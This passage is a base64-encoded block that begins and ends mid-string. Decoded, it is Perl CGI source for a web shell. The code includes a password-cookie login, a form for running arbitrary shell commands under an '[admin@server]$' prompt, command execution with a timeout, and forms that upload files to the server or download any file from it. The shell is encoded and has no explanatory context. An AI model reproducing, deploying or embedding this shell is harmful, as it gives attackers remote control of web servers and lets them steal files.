tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBHZXRDb29raWVzDQp7DQoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsNCglmb3JlYWNoICRjb29raWUoQGh0dHBjb29raWVzKQ0KCXsNCgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOw0KCQkkQ29va2llc3skaWR9ID0gJHZhbDsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICJDb25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9nb3V0DQp7DQoJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPTtcbiI7ICMgcmVtb3ZlIHBhc3N3b3JkIGNvb2tpZQ0KCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkmUHJpbnRMb2dvdXRTY3JlZW47DQoNCgkmUHJpbnRMb2dpblNjcmVlbjsNCgkmUHJpbnRMb2dpbkZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCglleGl0Ow0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQNCiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QNCiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyDQojIHRvIGxvZ2luDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ2luIA0Kew0KCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkDQoJew0KCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyOw0KCQlwcmludCAmTGlzdERpcjsNCgl9DQoJZWxzZSAjIHBhc3N3b3JkIGRpZG4ndCBtYXRjaA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCQkmUHJpbnRMb2dpblNjcmVlbjsNCgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZA0KCQl7DQoJCQkmUHJpbnRMb2dpbkZhaWxlZE1lc3NhZ2U7DQoNCgkJfQ0KCQkmUHJpbnRMb2dpbkZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCWV4aXQ7DQoJfQ0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkRW5jb2RlQ3VycmVudERpciA9IEVuY29kZURpcigkQ3VycmVudERpcik7DQoJbXkgJGRpcj0gIjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+Ii4mQWRkTGlua0RpcigiY29tbWFuZCIpLiI8L3NwYW4+IjsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIjxmb250IGNvbG9yPScjRkZGRkZGJz5bYWRtaW5cQCRTZXJ2ZXJOYW1lICRkaXJdXCQ8L2ZvbnQ+ICI7DQoJcmV0dXJuIDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiIgb25TdWJtaXQ9IkVuY29kZXIoJ2MnKSI+DQoNCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJjb21tYW5kIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRFbmNvZGVDdXJyZW50RGlyIj4NCiRQcm9tcHQNCjxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSI0MCIgbmFtZT0iYyIgaWQ9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZURvd25sb2FkRm9ybQ0Kew0KCSRFbmNvZGVDdXJyZW50RGlyID0gRW5jb2RlRGlyKCRDdXJyZW50RGlyKTsNCglteSAkZGlyID0gJkFkZExpbmtEaXIoImRvd25sb2FkIik7IA0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkZGlyXVwkICI7DQoJcmV0dXJuIDw8RU5EOw0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEVuY29kZUN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KDQo8L2Zvcm0+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byB1cGxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCW15ICRkaXI9ICZBZGRMaW5rRGlyKCJ1cGxvYWQiKTsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRkaXIgPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJCAiOw0KCXJldHVybiA8PEVORDsNCjxmb3JtIG5hbWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgaWQ9InVwIiB2YWx1ZT0ib3ZlcndyaXRlIj4NCjxsYWJlbCBmb3I9InVwIj5PdmVyd3JpdGUgaWYgaXQgRXhpc3RzPC9sYWJlbD48YnI+PGJyPg0KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEVuY29kZUN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9InVwbG9hZCI+DQo8L2Zvcm0+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bw0KIyB0ZXJtaW5hdGUgdGhlIHNjcmlwdCBpbW1lZGlhdGVseS4gVGhpcyBmdW5jdGlvbiBpcyB2YWxpZCBvbmx5IG9uIFVuaXguIEl0IGlzDQojIG5ldmVyIGNhbGxlZCB3aGVuIHRoZSBzY3JpcHQgaXMgcnVubmluZyBvbiBOVC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcmV0dXJuIDw8RU5EOw0KPC90ZXh0YXJlYT4NCjxicj48Zm9udCBjb2xvcj15ZWxsb3c+DQpDb21tYW5kIGV4Y2VlZGVkIG1heGltdW0gdGltZSBvZiAkQ29tbWFuZFRpbWVvdXREdXJhdGlvbiBzZWNvbmQocykuPC9mb250Pg0KPGJyPjxmb250IHNpemU9JzYnIGNvbG9yPXJlZD5LaWxsZWQgaXQhPC9mb250Pg0KRU5EDQoJfQ0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMgZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsNCglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglteSAkcmVzdWx0PSIiOw0KCWlmKC1lICRGaWxlVXJsKSAjIGlmIHRoZSBmaWxlIGV4aXN0cw0KCXsNCgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3Nlcg0KCQkkRmlsZVVybCA9fiBzLyhbXmEtekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJCSREb3dubG9hZExpbmsgPSAiJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZj0kRmlsZVVybCZvPWdvIjsNCgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkcmVzdWx0IC49IDw8RU5EOw0KU2VuZGluZyBGaWxlICRUcmFuc2ZlckZpbGUuLi48YnI+DQoNCklmIHRoZSBkb3dubG9hZCBkb2VzIG5vdCBzdGFydCBhdXRvbWF0aWNhbGx5LA0KPGEgaHJlZj0iJERvd25sb2FkTGluayI+Q2xpY2sgSGVyZTwvYT4NCkVORA0KCQkkcmVzdWx0IC49ICZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCX0NCgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0DQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhIjsNCgkJJHJlc3VsdCAuPSAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlDQojIGJyb3dzZXIsIHNvIHRoYXQgaXQgY2FuIGJlIGRvd25sb2FkZWQgYnkgdGhlIHVzZXIuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBzZW50Lg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFNlbmRGaWxlVG9Ccm93c2VyDQp7DQoJbXkgJHJlc3VsdCA9ICIiOw0KCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsNCglpZihvcGVuKFNFTkRGSUxFLCAkU2VuZEZpbGUpKSAjIGZpbGUgb3BlbmVkIGZvciByZWFkaW5nDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWJpbm1vZGUoU0VOREZJTEUpOw0KCQkJYmlubW9kZShTVERPVVQpOw0KCQl9DQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOw0KCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7DQoJCXByaW50ICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtdW5rbm93blxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7DQoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOw0KCQlwcmludCB3aGlsZSg8U0VOREZJTEU+KTsNCgkJY2xvc2UoU0VOREZJTEUpOw0KCQlleGl0KDEpOw0KCX0NCgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQ0KCXsNCgkJJHJlc3VsdCAuPSAiRmFpbGVkIHRvIGRvd25sb2FkICRTZW5kRmlsZTogJCEiOw0KCQkkcmVzdWx0IC49JlByaW50RmlsZURvd25sb2FkRm9ybTsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlDQojIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsgdGhyb3VnaCB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMgVGhpcyBmdW5jdGlvbiBpcyBhbHNvIGNhbGxlZCB3aGVuIHRoZSB1c2VyIGNsaWNrcyBvbiB0aGF0IGxpbmsuIEluIHRoaXMgY2FzZSwNCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBCZWdpbkRvd25sb2FkDQp7DQoJJEVuY29kZUN1cnJlbnREaXIgPSBFbmNvZGVEaXIoJEN1cnJlbnREaXIpOw0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwgaXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwgcHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCXJldHVybiAmUHJpbnRGaWxlVXBsb2FkRm9ybTsNCg0KCX0NCglteSAkcmVzdWx0PSIiOw0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJJHJlc3VsdCAuPSAiVXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJhbnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQxOw0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQkkcmVzdWx0IC49ICJGYWlsZWQ6IERlc3RpbmF0aW9uIGZpbGUgYWxyZWFkeSBleGlzdHMuPGJyPiI7DQoJfQ0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50DQoJew0KCQlpZihvcGVuKFVQTE9BREZJTEUsICI+JFRhcmdldE5hbWUiKSkNCgkJew0KCQkJYmlubW9kZShVUExPQURGSUxFKSBpZiAkV2luTlQ7DQoJCQlwcmludCBVUExPQURGSUxFICRpbnsnZmlsZWRhdGEnfTsNCgkJCWNsb3NlKFVQTE9BREZJTEUpOw0KCQkJJHJlc3VsdCAuPSAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQkkcmVzdWx0IC49ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQkkcmVzdWx0IC49ICJGYWlsZWQ6ICQhPGJyPiI7DQoJCX0NCgl9DQoJJHJlc3VsdCAuPSAmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlbmFtZSBpcyBub3Qgc3BlY2lmaWVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gYWxsb3dpbmcgdGhlIHVzZXIgdG8gc3BlY2lmeSBhDQojIGZpbGUsIG90aGVyd2lzZSBpdCBkaXNwbGF5cyBhIG1lc3NhZ2UgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluaw0KIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCXJldHVybiAmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCX0NCg0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwgKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQlyZXR1cm4gJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCXJldHVybiAmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCSRDdXJyZW50RGlyID0gJlRyaW1TbGFzaGVzKCRDdXJyZW50RGlyKTsNCglteSAkcmVzdWx0PSIiOw0KCWlmKCRSdW5Db21tYW5kID1+IG0vXlxzKmNkXHMrKC4rKS8pICMgaXQgaXMgYSBjaGFuZ2UgZGlyIGNvbW1hbmQNCgl7DQoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUNCgkJIyBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQuDQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREa